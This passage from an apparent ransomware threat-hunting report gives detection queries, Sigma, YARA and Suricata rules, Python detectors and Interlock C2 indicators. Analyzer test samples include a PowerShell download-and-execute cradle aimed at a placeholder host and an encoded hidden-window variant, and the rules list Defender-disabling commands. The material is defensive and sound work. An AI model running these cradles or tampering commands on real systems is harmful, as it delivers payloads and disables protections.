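    "encoded_cradle": "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand " + _encode(CRADLE),
    "plain_cradle": "$c = New-Object System.Net.WebClient; Invoke-Expression $c.DownloadString('http://example.invalid/x')",
    "admin_listing": "Get-ChildItem C:\\Users | Select-Object Name",
    "bypass_only": "powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File deploy.ps1",
}

if __name__ == "__main__":
    for name, text in SAMPLES.items():
        r = analyze(text)
        print(f"{name:15s} score={r['risk_score']:2d} sigma={r['sigma_match']} decoded={r['decoded']!r}")
```

Note that Event ID 4104 already records script blocks in decoded form, so the decoding step matters most for Event ID 4688 / Sysmon Event ID 1 command lines and for nested `FromBase64String` payloads; the "bypass_only" sample shows that `-ExecutionPolicy Bypass` on its own clears neither gate, which is the intended behaviour of both rules.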
T1486 — Data Encrypted for Impact (Impact) [P1]
Ransomware encryption using known extensions (.akira, .powerranges) and ransom note drops (fn.txt)
Splunk SPL:
index=sysmon EventCode=11 | rex field=TargetFilename "(?<extension>\.[^\.]+)$" | where extension IN (".akira",".powerranges",".anubis",".dragonforce",".interlock") OR TargetFilename="*\\fn.txt" OR TargetFilename="*\\README*.txt" | stats count earliest(_time) as first_seen latest(_time) as last_seen dc(TargetFilename) as unique_files by ComputerName, Image, extension | where unique_files>100 OR extension IN (".akira",".powerranges")
Elastic ES|QL:
FROM logs-* | WHERE event.code == "11" AND (file.path LIKE "*.akira" OR file.path LIKE "*.powerranges" OR file.name == "fn.txt" OR file.name LIKE "README*.txt") | STATS event_count = COUNT(*) BY host.name, process.name, file.extension
Sigma Rule:
```yaml
title: Ransomware File Extension Creation
id: 7d3e6e3e-4d0e-4a70-846f-a9ca37d876ff
status: stable
author: Florian Roth
date: 2022/06/14
modified: 2026/04/07
description: Detects known ransomware extensions being created
references:
  - https://github.com/SigmaHQ/sigma/blob/master/rules/windows/file_event/file_event_win_ransomware_unusual_extension.yml
logsource:
  product: windows
  category: file_event
detection:
  selection:
    TargetFilename|endswith:
      - '.akira'
      - '.powerranges'
      - '.anubis'
      - '.dragonforce'
      - '.interlock'
      - '.qilin'
      - '.agenda'
  selection_notes:
    TargetFilename|endswith:
      - '\fn.txt'
      - '\README.txt'
      - '\RECOVER.txt'
  condition: selection or selection_notes
falsepositives:
  - Unlikely
level: critical
```
Monitor for mass file renaming operations. Alert on creation of known ransom note filenames. Implement canary files in critical directories.
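The three signals this section and the Detection and Hunting Guidance call for (known extensions, ransom-note names, mass file writes), plus canary files, as an added Python example that is not part of the report. It evaluates Sysmon Event ID 11 records per (host, process) and uses a 60-second sliding window to catch an encryptor that writes an extension not on the list, which the Sigma rule above cannot see. The host names, process paths, canary path and threshold of 100 files per minute are constructed assumptions.

```python
# Added example (not from the report): classify Sysmon Event ID 11 (FileCreate)
# records by known ransomware extension, ransom-note name, canary file access,
# and a mass-write burst per process in a 60 s sliding window.
from collections import defaultdict
from datetime import datetime, timedelta
import ntpath

KNOWN_EXTENSIONS = {".akira", ".powerranges", ".anubis", ".dragonforce", ".interlock", ".qilin", ".agenda"}
RANSOM_NOTES = {"fn.txt", "readme.txt", "recover.txt"}      # readme.txt is noisy on its own
CANARY_FILES = {r"c:\shares\finance\~invoice_template.docx"}  # constructed canary path, lowercased
BURST_THRESHOLD = 100            # distinct files created by one process in one window
BURST_WINDOW = timedelta(seconds=60)


def classify_event(ev):
    """Return the per-event signals for one FileCreate record (may be empty)."""
    path = ev["TargetFilename"].lower()
    name = ntpath.basename(path)
    ext = ntpath.splitext(name)[1]
    signals = []
    if ext in KNOWN_EXTENSIONS:
        signals.append("known_extension")
    if name in RANSOM_NOTES:
        signals.append("ransom_note")
    if path in CANARY_FILES:
        signals.append("canary_touched")
    return signals


def hunt_file_events(events):
    """Group by (host, image) and return alerts with severity, signals and peak write rate."""
    groups = defaultdict(list)
    for ev in events:
        groups[(ev["ComputerName"], ev["Image"])].append(ev)
    alerts = []
    for (host, image), evs in groups.items():
        evs.sort(key=lambda e: e["UtcTime"])
        signals = set()
        for e in evs:
            signals.update(classify_event(e))
        # Sliding window: most distinct files this process created within BURST_WINDOW.
        peak, start = 0, 0
        for end in range(len(evs)):
            while evs[end]["UtcTime"] - evs[start]["UtcTime"] > BURST_WINDOW:
                start += 1
            peak = max(peak, len({e["TargetFilename"] for e in evs[start:end + 1]}))
        if peak >= BURST_THRESHOLD:
            signals.add("mass_write_burst")
        if not signals:
            continue
        # A note filename alone (README.txt from a build tool) needs corroboration.
        severity = "critical" if signals & {"known_extension", "canary_touched", "mass_write_burst"} else "low"
        alerts.append({"host": host, "image": image, "severity": severity,
                       "signals": sorted(signals), "peak_files_per_minute": peak})
    return sorted(alerts, key=lambda a: (a["severity"] != "critical", a["host"]))


def _event(host, image, path, t):
    return {"ComputerName": host, "Image": image, "TargetFilename": path, "UtcTime": datetime.fromisoformat(t)}


# Constructed sample telemetry.
T0 = datetime.fromisoformat("2026-04-07T02:00:00")
SAMPLE_EVENTS = (
    # 150 spreadsheets rewritten with an unlisted extension in 30 s by an unknown binary
    [{"ComputerName": "FILESRV01", "Image": r"C:\Windows\Temp\enc.exe",
      "TargetFilename": rf"C:\Shares\Finance\doc{i}.xlsx.locked", "UtcTime": T0 + timedelta(milliseconds=200 * i)}
     for i in range(150)]
    + [_event("FILESRV01", r"C:\Windows\Temp\enc.exe", r"C:\Shares\Finance\~invoice_template.docx", "2026-04-07T02:00:31"),
       _event("WS-RAD-07", r"C:\Users\mp\AppData\Roaming\w.exe", r"C:\Users\mp\Documents\scan.pdf.akira", "2026-04-07T02:10:00"),
       _event("WS-RAD-07", r"C:\Users\mp\AppData\Roaming\w.exe", r"C:\Users\mp\Documents\fn.txt", "2026-04-07T02:10:01"),
       _event("DEV-03", r"C:\Program Files\Git\mingw64\bin\git.exe", r"C:\src\tool\README.txt", "2026-04-07T02:12:00"),
       _event("WS-HR-11", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", r"C:\Users\hr\Documents\memo.docx", "2026-04-07T02:15:00")]
)

if __name__ == "__main__":
    for a in hunt_file_events(SAMPLE_EVENTS):
        print(f"{a['severity']:8s} {a['host']:10s} {a['image']}  {a['signals']}  peak/min={a['peak_files_per_minute']}")
```

The burst detector is what fires for the `.locked` case, where no extension or note in the rule matches; the canary hit on the same process is independent corroboration, which is why both signals appear on the FILESRV01 alert.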
T1562.001 — Impair Defenses: Disable or Modify Tools (Defense Evasion) [P1]
Ransomware groups disable Windows Defender and other security tools before encryption
Splunk SPL:
index=windows (source=WinEventLog:Security EventCode=4688 OR source=sysmon EventCode=1) (CommandLine="*Set-MpPreference*" OR CommandLine="*DisableRealtimeMonitoring*" OR CommandLine="*DisableIOAVProtection*" OR CommandLine="*Add-MpPreference*ExclusionPath*" OR CommandLine="*sc stop*" OR CommandLine="*net stop*") | regex CommandLine="(?i)(windefend|defender|sense|mbam|symantec|mcafee|kaspersky|sophos|crowdstrike)" | table _time ComputerName User CommandLine ParentCommandLine
Elastic KQL:
process.command_line:("Set-MpPreference" OR "DisableRealtimeMonitoring" OR "DisableIOAVProtection" OR "sc stop" OR "net stop") AND process.command_line:(windefend OR defender OR sense OR mbam OR symantec OR mcafee)
Sigma Rule:
```yaml
title: Windows Defender Tampering via PowerShell
id: 8d3e6e3e-4d0e-4a70-846f-a9ca37d876fe
status: experimental
author: RedSheep Security/Stone
date: 2026/04/07
description: Detects attempts to disable Windows Defender via PowerShell
references:
  - https://docs.microsoft.com/en-us/powershell/module/defender/
logsource:
  category: process_creation
  product: windows
detection:
  selection_mppreference:
    CommandLine|contains:
      - 'Set-MpPreference'
      - 'Add-MpPreference'
  selection_params:
    CommandLine|contains:
      - 'DisableRealtimeMonitoring'
      - 'DisableIOAVProtection'
      - 'DisableBehaviorMonitoring'
      - 'DisableScriptScanning'
      - 'ExclusionPath C:\'
      - 'ExclusionProcess'
  selection_service:
    CommandLine|contains:
      - 'sc stop WinDefend'
      - 'net stop WinDefend'
      - 'Stop-Service WinDefend'
  condition: (selection_mppreference and selection_params) or selection_service
falsepositives:
  - Legitimate administrator tasks
  - AV management tools
level: high
```
Enable tamper protection via Group Policy. Alert on any attempt to modify Defender settings or stop security services.
T1055 — Process Injection (Defense Evasion) [P2]
Used by multiple ransomware groups for defense evasion and privilege escalation
Splunk SPL:
index=sysmon EventCode=8 | eval suspicious_target=case(match(TargetImage,"(?i)(explorer\.exe|svchost\.exe|winlogon\.exe|services\.exe|lsass\.exe|csrss\.exe)"),1,1=1,0) | eval suspicious_source=case(match(SourceImage,"(?i)(powershell\.exe|cmd\.exe|rundll32\.exe|regsvr32\.exe|mshta\.exe|wscript\.exe|cscript\.exe)"),1,1=1,0) | where suspicious_target=1 OR suspicious_source=1 | table _time ComputerName SourceImage TargetImage StartFunction StartModule
Elastic KQL:
event.code:8 AND (process.target.name:(explorer.exe OR svchost.exe OR winlogon.exe OR services.exe OR lsass.exe) OR process.parent.name:(powershell.exe OR cmd.exe OR rundll32.exe))
Focus on injection into critical system processes. Cobalt Strike commonly injects into svchost.exe and explorer.exe.
T1046 — Network Service Scanning (Discovery) [P3]
Internal reconnaissance post-compromise to identify high-value targets for encryption and lateral movement
Splunk SPL:
index=firewall action=allowed | stats dc(dest_port) as unique_ports values(dest_port) as ports_scanned earliest(_time) as first_seen latest(_time) as last_seen by src_ip, dest_ip | where unique_ports>20 | eval scan_duration=round((last_seen-first_seen)/60,2) | where scan_duration<10
Elastic ES|QL:
FROM logs-* | WHERE event.action == "allowed" | STATS unique_ports = COUNT_DISTINCT(destination.port) BY source.ip, destination.ip | WHERE unique_ports > 20
Baseline normal port usage patterns. Alert on hosts suddenly scanning multiple ports across multiple internal systems.
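The two flow-based hunts in this guide, T1041 (more than 100 GB from one source to one non-RFC1918 destination within 24 hours, also described under "Track large outbound data transfers" in the Detection and Hunting Guidance) and T1046 (more than 20 distinct destination ports on one internal host in under 10 minutes), as one added Python example that is not part of the report, run over constructed flow records. The hosts, the flow record layout, and the external addresses (203.0.113.0/24 and 198.51.100.0/24 are documentation ranges used as placeholders) are assumptions.

```python
# Added example (not from the report): egress-volume and port-scan hunts over
# flow records, mirroring the two SPL queries (cidrmatch exclusion, 100 GB
# threshold; dc(dest_port) > 20 within < 10 minutes).
import ipaddress
from collections import defaultdict
from datetime import datetime, timedelta

PRIVATE = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
GB = 1024 ** 3
EGRESS_THRESHOLD_BYTES = 100 * GB
SCAN_MIN_PORTS = 20
SCAN_MAX_DURATION = timedelta(minutes=10)


def is_private(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in PRIVATE)


def egress_findings(flows, threshold=EGRESS_THRESHOLD_BYTES, window=timedelta(hours=24)):
    """Sum bytes_out per (src, dst) to external addresses within the trailing window.
    The SPL above does the same with cidrmatch() plus a CDN allowlist lookup."""
    totals = defaultdict(int)
    latest = max(f["ts"] for f in flows)
    for f in flows:
        if latest - f["ts"] > window or is_private(f["dst"]):
            continue
        totals[(f["src"], f["dst"])] += f["bytes_out"]
    return sorted(
        ({"src": s, "dst": d, "total_gb": round(b / GB, 2)} for (s, d), b in totals.items() if b > threshold),
        key=lambda x: -x["total_gb"],
    )


def scan_findings(flows, min_ports=SCAN_MIN_PORTS, max_duration=SCAN_MAX_DURATION):
    """Distinct destination ports per (src, dst) and the time span in which they were hit."""
    seen = defaultdict(lambda: {"ports": set(), "first": None, "last": None})
    for f in flows:
        s = seen[(f["src"], f["dst"])]
        s["ports"].add(f["dport"])
        s["first"] = f["ts"] if s["first"] is None else min(s["first"], f["ts"])
        s["last"] = f["ts"] if s["last"] is None else max(s["last"], f["ts"])
    out = []
    for (src, dst), s in seen.items():
        span = s["last"] - s["first"]
        # Fast, wide probing; a slow sweep over hours is deliberately outside this rule.
        if len(s["ports"]) > min_ports and span < max_duration:
            out.append({"src": src, "dst": dst, "unique_ports": len(s["ports"]),
                        "scan_minutes": round(span / timedelta(minutes=1), 2)})
    return sorted(out, key=lambda x: -x["unique_ports"])


def _flow(ts, src, dst, dport, bytes_out):
    return {"ts": datetime.fromisoformat(ts), "src": src, "dst": dst, "dport": dport, "bytes_out": bytes_out}


# Constructed sample flows.
T0 = datetime.fromisoformat("2026-04-06T20:00:00")
SAMPLE_FLOWS = (
    # 12 x 10 GB over 6 h from one EHR server to one external host: staged exfiltration
    [{"ts": T0 + timedelta(minutes=30 * i), "src": "10.10.5.7", "dst": "203.0.113.50", "dport": 443, "bytes_out": 10 * GB}
     for i in range(12)]
    # 50 GB to the internal backup target: dropped by the RFC1918 exclusion
    + [_flow("2026-04-06T22:00:00", "10.10.5.8", "10.0.0.5", 445, 50 * GB)]
    # 30 GB to a partner: under threshold
    + [_flow("2026-04-06T23:00:00", "10.10.5.9", "198.51.100.9", 443, 30 * GB)]
    # 25 ports on one internal host in 4 minutes: scan
    + [{"ts": T0 + timedelta(seconds=10 * i), "src": "10.10.7.3", "dst": "10.10.0.10", "dport": 1 + i, "bytes_out": 64}
       for i in range(25)]
    # 25 ports spread over 2 hours: below the duration bar of this rule
    + [{"ts": T0 + timedelta(minutes=5 * i), "src": "10.10.7.5", "dst": "10.10.0.12", "dport": 1 + i, "bytes_out": 64}
       for i in range(25)]
    # 5 ports: normal service use
    + [_flow("2026-04-06T20:01:00", "10.10.7.4", "10.10.0.11", p, 64) for p in (80, 443, 445, 135, 3389)]
)

if __name__ == "__main__":
    print("egress:", egress_findings(SAMPLE_FLOWS))
    print("scans: ", scan_findings(SAMPLE_FLOWS))
```

The per-pair 24-hour sum is what makes the 12 separate 10 GB transfers visible as one 120 GB event, which a per-flow threshold would miss; the slow 2-hour sweep is left out on purpose so that the rule stays aligned with the SPL, and would need a separate long-window rule.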
Indicators of Compromise
| Type | Value | Context |
|---|---|---|
| domain | existed-bunch-balance-council.trycloudflare.com | Interlock C2 domain using Cloudflare tunneling |
| domain | ferrari-rolling-facilities-lounge.trycloudflare.com | Interlock C2 domain using Cloudflare tunneling |
| domain | ranked-accordingly-ab-hired.trycloudflare.com | Interlock C2 domain using Cloudflare tunneling |
| filename | fn.txt | Akira ransomware ransom note filename |
| filename | .akira | File extension used by early Akira ransomware variants |
| filename | .powerranges | File extension used by Megazord encryptor (Akira variant) |
IOC Sweep Queries (Splunk):
index=dns (query="existed-bunch-balance-council.trycloudflare.com" OR answer="existed-bunch-balance-council.trycloudflare.com") | stats count by src_ip, query_type, answer
index=dns (query="ferrari-rolling-facilities-lounge.trycloudflare.com" OR answer="ferrari-rolling-facilities-lounge.trycloudflare.com") | stats count by src_ip, query_type, answer
index=dns (query="ranked-accordingly-ab-hired.trycloudflare.com" OR answer="ranked-accordingly-ab-hired.trycloudflare.com") | stats count by src_ip, query_type, answer
index=* source=*sysmon* EventCode=11 TargetFilename="*\\fn.txt" | table _time ComputerName TargetFilename Image User
index=* source=*sysmon* EventCode=11 TargetFilename="*.akira" | stats count by ComputerName, Image | where count>10
index=* source=*sysmon* EventCode=11 TargetFilename="*.powerranges" | stats count by ComputerName, Image | where count>10
YARA Rules
Akira_Ransomware_Indicators — Detects Akira ransomware variants including ransom notes and file markers
```yara
rule Akira_Ransomware_Indicators {
    meta:
        description = "Detects Akira ransomware variants and ransom notes"
        author = "RedSheep Security/Stone"
        date = "2026-04-07"
        reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-109a"
        hash1 = "example_hash_would_go_here"
    strings:
        $note1 = "fn.txt" nocase
        $note2 = "AKIRA_README.txt" nocase
        $extension1 = ".akira" nocase
        $extension2 = ".powerranges" nocase
        $ransom_text1 = "Your network has been encrypted" nocase
        $ransom_text2 = "We have also downloaded" nocase
        $ransom_text3 = "Do not try to decrypt" nocase
        $mutex1 = "akira_mutex" wide ascii
        $pdb1 = "akira.pdb" nocase
    condition:
        any of ($note*) or
        any of ($extension*) or
        2 of ($ransom_text*) or
        any of ($mutex*, $pdb*)
}
```
Cobalt_Strike_Beacon_Indicators — Detects Cobalt Strike beacons used by Interlock and DragonForce actors
```yara
rule Cobalt_Strike_Beacon_Indicators {
    meta:
        description = "Detects Cobalt Strike beacon indicators"
        author = "Elastic"
        date = "2021-03-16"
        reference = "https://www.elastic.co/blog/detecting-cobalt-strike-with-memory-signatures"
    strings:
        $beacon_x64_1 = { 48 89 5C 24 08 48 89 74 24 10 57 48 83 EC 20 49 8B F0 8B DA 48 8B F9 45 84 C9 }
        $beacon_x86_1 = { 8B 55 08 53 56 8B 75 0C 57 8D 04 32 8B 00 89 45 08 8B 45 10 85 C0 }
        $beacon_dll_1 = { 73 70 72 6F 63 5F 61 64 64 }
        $beacon_dll_2 = { 69 6E 73 74 61 6E 63 65 5F 64 61 74 61 }
        $beacon_config = { 00 01 00 01 00 02 }
        $sleep_mask = { 48 8B C4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 45 33 DB }
    condition:
        any of ($beacon_x64*, $beacon_x86*) or
        all of ($beacon_dll*) or
        $beacon_config or
        $sleep_mask
}
```
SystemBC_RAT — Detects SystemBC RAT components used by ransomware groups for C2 communications. Because bcdedit.exe, socks5 and \pipe\ also occur in legitimate software and the condition is `2 of them`, treat matches as triage leads rather than block decisions.
rule SystemBC_RAT {
    meta:
        description = "Detects SystemBC RAT components"
        author = "RedSheep Security/Stone"
        date = "2026-04-07"
        reference = "Internal Research"
    strings:
        $str1 = "SystemBC" wide ascii
        $str2 = "bcdedit.exe" wide ascii
        $str3 = "socks5" wide ascii
        $str4 = "\\pipe\\" wide
        $mutex1 = "Global\\SystemBC" wide ascii
        $pdb1 = "SystemBC.pdb" ascii
        $hex1 = { 53 79 73 74 65 6D 42 43 }
    condition:
        2 of them
}
Suricata Rules
SID 2051001 — Detects Interlock C2 Cloudflare tunnel DNS queries
alert dns $HOME_NET any -> any any (msg:"ET MALWARE Interlock C2 Cloudflare Tunnel DNS Query"; dns.query; content:"trycloudflare.com"; nocase; pcre:"/^(existed-bunch-balance-council|ferrari-rolling-facilities-lounge|ranked-accordingly-ab-hired)\.trycloudflare\.com$/i"; reference:url,www.cisa.gov/news-events/cybersecurity-advisories/aa25-203a; classtype:trojan-activity; sid:2051001; rev:1;)
SID 2051002 — Detects potential Cobalt Strike beacon traffic patterns
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET MALWARE Possible Cobalt Strike Beacon Activity"; flow:established,to_server; content:"POST"; http_method; content:"/submit.php"; http_uri; content:"Content-Type|3a 20|application/octet-stream"; http_header; byte_test:2,>,1000,0,relative; threshold:type limit,track by_src,count 1,seconds 60; reference:url,blog.sekoia.io/hunting-and-detecting-cobalt-strike; classtype:trojan-activity; sid:2051002; rev:1;)
SID 2051003 — Flags a single TCP session in which the client has sent more than 1 GiB to an external host, a possible exfiltration indicator. It inspects one connection at a time; cumulative volume spread across many sessions has to come from flow data (see Data Source Requirements).
alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"ET POLICY Potential Data Exfiltration - Large Outbound Transfer"; flow:established,to_server; stream_size:client,>,1073741824; threshold:type limit,track by_src,count 1,seconds 3600; reference:url,internal; classtype:policy-violation; sid:2051003; rev:1;)
Data Source Requirements
| Source | Required For | Notes |
|---|---|---|
| Sysmon | T1003.001, T1059.001, T1486, T1562.001, T1055 | EventID 1 (Process Creation), EventID 8 (CreateRemoteThread), EventID 10 (ProcessAccess), EventID 11 (FileCreate) required. Deploy Sysmon with SwiftOnSecurity config minimum. |
| Windows Security | T1190, T1059.001, T1562.001, T1046 | EventID 4688 (Process Creation with command line), 4625 (Failed Logon), 5156 (Network Connection) required. Enable command line logging in audit policy. |
| DNS Logs | T1102.002, T1041 | Full DNS query logging required. Consider DNS sinkholes for known malicious domains. |
| Network Flow | T1041, T1046 | NetFlow v9/IPFIX or equivalent. Required for detecting large data transfers and scanning activity. |
| PowerShell Logs | T1059.001 | ScriptBlock Logging (EventID 4104) and Module Logging required. Enable via Group Policy. |
| Proxy Logs | T1102.002, T1041 | HTTPS inspection recommended for detecting Cloudflare tunnel abuse and data exfiltration. |
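The volume check that SID 2051003 and the Network Flow row above are really after is cumulative: bytes per internal source to external hosts over a time window, which no per-packet signature can measure. The following is an added example, not RedSheep's or Suricata's own code; it sums constructed NetFlow-style records in fixed one-hour buckets and raises one alert per source per window above 1 GiB, mirroring the rule's `threshold:type limit,track by_src,count 1,seconds 3600`. The RFC 1918 ranges standing in for $HOME_NET are an assumption.

```python
"""Per-source outbound volume monitor over constructed flow records (added example).

Sums bytes from each internal host to external destinations in fixed one-hour
windows and alerts once per source per window when the total exceeds 1 GiB,
the threshold used in Suricata rule 2051003.
"""
from collections import defaultdict
from datetime import datetime, timezone
from ipaddress import ip_address, ip_network

# Assumed stand-in for $HOME_NET; replace with the real internal ranges.
HOME_NET = [ip_network("10.0.0.0/8"), ip_network("172.16.0.0/12"), ip_network("192.168.0.0/16")]
THRESHOLD_BYTES = 1073741824   # 1 GiB, as in the Suricata rule
WINDOW_SECONDS = 3600          # seconds 3600 in the threshold clause

MiB = 1024 ** 2

# Constructed flow records: (flow start, src, dst, dst_port, bytes sent by src).
FLOWS = [
    ("2026-04-07T02:10:00+00:00", "10.20.1.15", "203.0.113.10", 443, 700 * MiB),
    ("2026-04-07T02:40:00+00:00", "10.20.1.15", "203.0.113.10", 443, 500 * MiB),   # same hour: 1200 MiB total
    ("2026-04-07T03:05:00+00:00", "10.20.1.15", "203.0.113.10", 443, 100 * MiB),   # next hour, under threshold
    ("2026-04-07T02:15:00+00:00", "10.20.3.7", "10.50.0.2", 445, 2048 * MiB),      # internal to internal, ignored
    ("2026-04-07T02:20:00+00:00", "10.20.5.9", "198.51.100.7", 443, 300 * MiB),
    ("2026-04-07T02:25:00+00:00", "198.51.100.7", "10.20.5.9", 51000, 900 * MiB),  # inbound, ignored
]


def is_internal(ip: str) -> bool:
    addr = ip_address(ip)
    return any(addr in net for net in HOME_NET)


def window_start(ts_iso: str) -> int:
    """Epoch second of the fixed one-hour bucket containing ts_iso."""
    epoch = int(datetime.fromisoformat(ts_iso).timestamp())
    return epoch - (epoch % WINDOW_SECONDS)


def outbound_volume(flows):
    """Bytes from internal sources to external destinations, keyed by (src, window_start)."""
    totals = defaultdict(int)
    for ts, src, dst, _port, nbytes in flows:
        if is_internal(src) and not is_internal(dst):
            totals[(src, window_start(ts))] += nbytes
    return dict(totals)


def exfil_alerts(flows, threshold=THRESHOLD_BYTES):
    """One (src, window_iso, total_bytes) tuple per source and hour above threshold."""
    alerts = []
    for (src, ws), total in sorted(outbound_volume(flows).items()):
        if total > threshold:
            alerts.append((src, datetime.fromtimestamp(ws, tz=timezone.utc).isoformat(), total))
    return alerts


if __name__ == "__main__":
    for src, window, total in exfil_alerts(FLOWS):
        print(f"ALERT {src} sent {total / MiB:.0f} MiB to external hosts in the hour starting {window}")
```

Fixed hourly buckets keep the logic simple and match the rule's threshold semantics; a sliding window catches transfers that straddle an hour boundary but needs per-flow retention, and a per-host baseline is what separates a nightly cloud backup from exfiltration.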
Sources
- OCR Fines Four Regulated Entities for HIPAA Violations That Led to Ransomware Attacks
- Weak Risk Analysis Cost 4 Firms $1.7 Million in HIPAA Fines
- Healthcare Ransomware Attacks: OC Practices & Cybersecurity
- Brockton Hospital Ransomware Attack: Downtime Procedures to Continue for Two Weeks
- Brockton Hospital Implements Downtime Procedure After Ransomware Attack
- February 2026 Healthcare Data Breach Report
- Ransomware Statistics 2026: Attacks, Costs & Trends
- 60+ Healthcare Data Breach Statistics for 2026
- #StopRansomware: Interlock | CISA
- #StopRansomware: Akira Ransomware | CISA
- DragonForce Calls for Ransomware Cartel with LockBit and Qilin
- Detailed Analysis of DragonForce Ransomware
- Qilin/Agenda Ransomware: The Credential Stealers
- 2025 Healthcare Data Breach Report
- Healthcare Sector Most Targeted by Ransomware Groups as Attacks Increase 49% YOY
- Data Breach Statistics 2026: Records, Costs & Industries